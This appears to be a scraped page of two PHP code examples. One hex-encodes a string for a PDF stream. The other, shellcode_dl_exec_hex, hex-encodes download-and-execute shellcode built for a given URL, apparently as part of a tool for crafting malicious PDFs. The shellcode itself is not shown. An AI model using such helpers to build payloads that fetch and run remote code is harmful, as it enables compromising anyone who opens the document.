Exemplo n.º 1
0
function pdf_ASCIIHexEncode($string)
{
    return str_to_hex($string) . ">";
}
Exemplo n.º 2
0
function shellcode_dl_exec_hex($url)
{
    $shellcode = str_to_hex(uescape(shellcode_dl_exec($url)));
    return $shellcode;
}